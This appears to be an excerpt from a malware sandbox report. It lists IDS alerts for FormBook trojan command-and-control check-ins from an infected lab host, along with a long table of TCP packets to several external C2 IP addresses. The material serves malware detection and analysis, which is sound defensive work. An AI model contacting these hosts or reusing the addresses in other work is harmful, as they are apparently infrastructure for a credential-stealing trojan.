06/06/24-13:25:26.238775	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49743	80	192.168.2.4	172.65.176.239
06/06/24-13:26:08.833276	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49753	80	192.168.2.4	162.241.216.140
06/06/24-13:29:14.686695	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49794	80	192.168.2.4	162.241.216.140
06/06/24-13:25:42.135789	TCP	2856318	ETPRO TROJAN FormBook CnC Checkin (POST) M4	49744	80	192.168.2.4	162.241.216.140
06/06/24-13:26:38.908278	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49762	80	192.168.2.4	91.195.240.123
06/06/24-13:25:44.667908	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49745	80	192.168.2.4	162.241.216.140
06/06/24-13:26:29.812462	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49760	80	192.168.2.4	217.160.0.111
06/06/24-13:28:11.901387	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49782	80	192.168.2.4	199.59.243.225
06/06/24-13:27:41.611068	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49776	80	192.168.2.4	103.168.172.37
06/06/24-13:25:55.515936	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49749	80	192.168.2.4	57.151.38.169
06/06/24-13:27:11.747599	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49769	80	192.168.2.4	136.143.180.12
06/06/24-13:28:55.215829	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49789	80	192.168.2.4	162.241.216.140
06/06/24-13:27:19.342074	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49772	80	192.168.2.4	136.143.180.12
06/06/24-13:29:03.871692	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49791	80	192.168.2.4	57.151.38.169
06/06/24-13:27:14.281341	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49770	80	192.168.2.4	136.143.180.12
06/06/24-13:27:49.969362	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49778	80	192.168.2.4	104.37.39.71
06/06/24-13:28:16.966166	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49784	80	192.168.2.4	199.59.243.225
06/06/24-13:28:50.157425	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49787	80	192.168.2.4	162.241.216.140
06/06/24-13:26:57.622372	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49768	80	192.168.2.4	162.0.237.22
06/06/24-13:28:09.334309	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49781	80	192.168.2.4	199.59.243.225
06/06/24-13:26:50.033320	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49765	80	192.168.2.4	162.0.237.22
06/06/24-13:27:36.539281	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49774	80	192.168.2.4	103.168.172.37
06/06/24-13:27:55.028027	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49780	80	192.168.2.4	104.37.39.71
06/06/24-13:28:41.842825	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49785	80	192.168.2.4	172.65.176.239
06/06/24-13:25:58.046973	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49750	80	192.168.2.4	57.151.38.169
06/06/24-13:26:52.565318	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49766	80	192.168.2.4	162.0.237.22
06/06/24-13:26:24.753306	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49758	80	192.168.2.4	217.160.0.111
06/06/24-13:26:03.105993	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49752	80	192.168.2.4	57.151.38.169
06/06/24-13:26:11.375901	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49754	80	192.168.2.4	162.241.216.140
06/06/24-13:28:47.623380	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49786	80	192.168.2.4	162.241.216.140
06/06/24-13:25:42.135789	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49744	80	192.168.2.4	162.241.216.140
06/06/24-13:25:49.730984	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49747	80	192.168.2.4	162.241.216.140
06/06/24-13:26:44.036182	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49764	80	192.168.2.4	91.195.240.123
06/06/24-13:29:08.950223	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49793	80	192.168.2.4	57.151.38.169
06/06/24-13:26:16.436568	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49756	80	192.168.2.4	162.241.216.140
06/06/24-13:26:36.375957	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49761	80	192.168.2.4	91.195.240.123
06/06/24-13:26:22.205167	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49757	80	192.168.2.4	217.160.0.111
06/06/24-13:27:47.437482	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49777	80	192.168.2.4	104.37.39.71
06/06/24-13:29:00.935368	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49790	80	192.168.2.4	57.151.38.169

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2024 13:25:26.230729103 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:26.235766888 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:26.235892057 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:26.238775015 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:26.243772984 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.009924889 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.009982109 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010016918 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010047913 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010070086 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:27.010082960 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010111094 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:27.010305882 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010320902 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010337114 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010374069 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:27.010502100 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010515928 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:27.010516882 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.010591030 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:27.011138916 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:27.011254072 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:27.014167070 CEST	49743	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:25:27.019067049 CEST	80	49743	172.65.176.239	192.168.2.4
Jun 6, 2024 13:25:42.128175974 CEST	49744	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:42.133102894 CEST	80	49744	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:42.133235931 CEST	49744	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:42.135788918 CEST	49744	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:42.140698910 CEST	80	49744	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:42.802359104 CEST	80	49744	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:42.834722996 CEST	80	49744	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:42.834872007 CEST	49744	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:43.644505978 CEST	49744	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:44.661133051 CEST	49745	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:44.666106939 CEST	80	49745	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:44.666213036 CEST	49745	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:44.667907953 CEST	49745	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:44.672866106 CEST	80	49745	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:45.333834887 CEST	80	49745	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:45.366760015 CEST	80	49745	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:45.366822004 CEST	49745	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:46.174433947 CEST	49745	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:47.194765091 CEST	49746	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:47.200973034 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.201205015 CEST	49746	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:47.203592062 CEST	49746	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:47.209127903 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.209347963 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.209378958 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.209429979 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.209456921 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.210270882 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.210407019 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.210457087 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.210484982 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.870341063 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.903465986 CEST	80	49746	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:47.903698921 CEST	49746	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:48.705667973 CEST	49746	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:49.724062920 CEST	49747	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:49.729116917 CEST	80	49747	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:49.729240894 CEST	49747	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:49.730983973 CEST	49747	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:49.735915899 CEST	80	49747	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:50.386384964 CEST	80	49747	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:50.418808937 CEST	80	49747	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:50.419013023 CEST	49747	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:50.420394897 CEST	49747	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:25:50.425324917 CEST	80	49747	162.241.216.140	192.168.2.4
Jun 6, 2024 13:25:55.508972883 CEST	49749	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:55.513967037 CEST	80	49749	57.151.38.169	192.168.2.4
Jun 6, 2024 13:25:55.514054060 CEST	49749	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:55.515935898 CEST	49749	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:55.520865917 CEST	80	49749	57.151.38.169	192.168.2.4
Jun 6, 2024 13:25:56.173424006 CEST	80	49749	57.151.38.169	192.168.2.4
Jun 6, 2024 13:25:56.208303928 CEST	80	49749	57.151.38.169	192.168.2.4
Jun 6, 2024 13:25:56.208368063 CEST	49749	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:57.018174887 CEST	49749	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:58.038975000 CEST	49750	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:58.043931007 CEST	80	49750	57.151.38.169	192.168.2.4
Jun 6, 2024 13:25:58.044065952 CEST	49750	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:58.046972990 CEST	49750	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:58.052036047 CEST	80	49750	57.151.38.169	192.168.2.4
Jun 6, 2024 13:25:58.716847897 CEST	80	49750	57.151.38.169	192.168.2.4
Jun 6, 2024 13:25:58.758347988 CEST	80	49750	57.151.38.169	192.168.2.4
Jun 6, 2024 13:25:58.758469105 CEST	49750	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:25:59.549494028 CEST	49750	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:00.567899942 CEST	49751	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:00.572902918 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.572987080 CEST	49751	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:00.575181961 CEST	49751	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:00.580049038 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.580435991 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.580459118 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.580472946 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.580502987 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.580554008 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.580566883 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.580646992 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:00.580673933 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:01.222850084 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:01.265681028 CEST	80	49751	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:01.265783072 CEST	49751	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:02.080810070 CEST	49751	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:03.099009991 CEST	49752	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:03.104010105 CEST	80	49752	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:03.104104996 CEST	49752	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:03.105993032 CEST	49752	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:03.110887051 CEST	80	49752	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:03.765876055 CEST	80	49752	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:03.806574106 CEST	80	49752	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:03.806710958 CEST	49752	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:03.807506084 CEST	49752	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:26:03.812422037 CEST	80	49752	57.151.38.169	192.168.2.4
Jun 6, 2024 13:26:08.825470924 CEST	49753	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:08.831397057 CEST	80	49753	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:08.831507921 CEST	49753	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:08.833276033 CEST	49753	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:08.838308096 CEST	80	49753	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:09.497087002 CEST	80	49753	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:09.531224966 CEST	80	49753	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:09.531424999 CEST	49753	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:10.346323013 CEST	49753	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:11.364649057 CEST	49754	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:11.369596004 CEST	80	49754	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:11.369759083 CEST	49754	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:11.375900984 CEST	49754	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:11.380790949 CEST	80	49754	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:12.026194096 CEST	80	49754	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:12.058826923 CEST	80	49754	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:12.058979034 CEST	49754	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:12.877578974 CEST	49754	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:13.897175074 CEST	49755	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:13.902497053 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.902609110 CEST	49755	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:13.905622005 CEST	49755	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:13.910629034 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.910685062 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.910720110 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.910800934 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.910839081 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.910887957 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.910919905 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.910972118 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:13.911003113 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:14.568348885 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:14.601038933 CEST	80	49755	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:14.601274014 CEST	49755	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:15.409001112 CEST	49755	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:16.428493023 CEST	49756	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:16.433870077 CEST	80	49756	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:16.434007883 CEST	49756	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:16.436568022 CEST	49756	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:16.442581892 CEST	80	49756	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:17.104584932 CEST	80	49756	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:17.137979984 CEST	80	49756	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:17.138160944 CEST	49756	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:17.145172119 CEST	49756	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:26:17.149998903 CEST	80	49756	162.241.216.140	192.168.2.4
Jun 6, 2024 13:26:22.198225021 CEST	49757	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:22.203258991 CEST	80	49757	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:22.203346968 CEST	49757	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:22.205167055 CEST	49757	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:22.210264921 CEST	80	49757	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:23.035398960 CEST	80	49757	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:23.035444975 CEST	80	49757	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:23.035522938 CEST	49757	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:23.154181957 CEST	80	49757	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:23.154274940 CEST	49757	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:23.721343040 CEST	49757	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:24.741317034 CEST	49758	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:24.746577978 CEST	80	49758	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:24.749484062 CEST	49758	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:24.753305912 CEST	49758	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:24.758326054 CEST	80	49758	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:25.575438976 CEST	80	49758	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:25.575505018 CEST	80	49758	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:25.575644970 CEST	49758	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:25.694576979 CEST	80	49758	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:25.694641113 CEST	49758	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:26.252629042 CEST	49758	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:27.272672892 CEST	49759	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:27.278042078 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.278204918 CEST	49759	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:27.280215025 CEST	49759	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:27.285347939 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.285412073 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.285465002 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.285494089 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.285543919 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.285573006 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.285602093 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.285650969 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:27.285680056 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:28.117235899 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:28.117300987 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:28.117362976 CEST	49759	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:28.236646891 CEST	80	49759	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:28.236716986 CEST	49759	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:28.783827066 CEST	49759	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:29.805296898 CEST	49760	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:29.810571909 CEST	80	49760	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:29.810776949 CEST	49760	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:29.812462091 CEST	49760	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:29.817467928 CEST	80	49760	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:30.643635035 CEST	80	49760	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:30.643701077 CEST	80	49760	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:30.643739939 CEST	80	49760	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:30.643779993 CEST	80	49760	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:30.643781900 CEST	49760	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:30.643886089 CEST	49760	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:30.762836933 CEST	80	49760	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:30.762955904 CEST	49760	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:30.763709068 CEST	49760	80	192.168.2.4	217.160.0.111
Jun 6, 2024 13:26:30.768646002 CEST	80	49760	217.160.0.111	192.168.2.4
Jun 6, 2024 13:26:36.365911007 CEST	49761	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:36.371012926 CEST	80	49761	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:36.372402906 CEST	49761	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:36.375957012 CEST	49761	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:36.380945921 CEST	80	49761	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:37.217580080 CEST	80	49761	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:37.268172026 CEST	49761	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:37.344281912 CEST	80	49761	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:37.344356060 CEST	49761	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:37.877600908 CEST	49761	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:38.900593042 CEST	49762	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:38.905786037 CEST	80	49762	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:38.905873060 CEST	49762	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:38.908277988 CEST	49762	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:38.913213015 CEST	80	49762	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:39.745384932 CEST	80	49762	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:39.799520969 CEST	49762	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:39.874620914 CEST	80	49762	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:39.874783039 CEST	49762	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:40.427546978 CEST	49762	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:41.443289995 CEST	49763	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:41.448676109 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.448762894 CEST	49763	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:41.451986074 CEST	49763	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:41.456960917 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.457195044 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.457258940 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.457289934 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.457344055 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.457371950 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.457400084 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.457427979 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:41.457459927 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:42.956054926 CEST	49763	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:42.961803913 CEST	80	49763	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:42.961874008 CEST	49763	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:43.992274046 CEST	49764	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:43.997616053 CEST	80	49764	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:44.001740932 CEST	49764	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:44.036181927 CEST	49764	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:44.041363001 CEST	80	49764	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:44.839747906 CEST	80	49764	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:44.893167973 CEST	49764	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:44.967426062 CEST	80	49764	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:44.967550039 CEST	49764	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:44.968437910 CEST	49764	80	192.168.2.4	91.195.240.123
Jun 6, 2024 13:26:44.973396063 CEST	80	49764	91.195.240.123	192.168.2.4
Jun 6, 2024 13:26:50.021316051 CEST	49765	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:50.026355028 CEST	80	49765	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:50.029431105 CEST	49765	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:50.033319950 CEST	49765	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:50.038309097 CEST	80	49765	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:50.696981907 CEST	80	49765	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:50.729378939 CEST	80	49765	162.0.237.22	192.168.2.4
